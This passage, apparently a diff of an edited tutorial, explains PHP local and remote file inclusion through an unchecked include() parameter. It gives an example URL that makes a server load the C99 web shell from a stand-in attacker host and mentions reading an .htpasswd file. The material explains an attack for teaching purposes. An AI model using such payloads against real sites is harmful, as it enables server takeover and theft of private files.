Table of Contents

 In PHP, there is a function that can be used to include an entire page to the actual one.
 It is surprisingly named “include”.
 Wrongly used, it can be really harmful because it allows external code execution which can result in a lot of unpleasant things such as an attacker getting some private files on the server.

 This is where the problem occurs.
 The developer decided to put the real file name in the variable and since there are no checks done, it is possible to access any file the webserver has access to or any file on the internet.
-For example, if there is an .htpasswd in
+For example, if there is a

 /var/security/.htpasswd, we just have to load the page

-The second thing that could be done is calling some scripts on the internet.
+The second thing that could be done is to call some scripts on the internet.
 An attacker could for example load a shell (like the famous C99) on the server and do whatever he wants.
 He would just have to call the page

 www.mywebsite.com/index.php?page=http://pirate.com/c99.php and c99.php will be executed.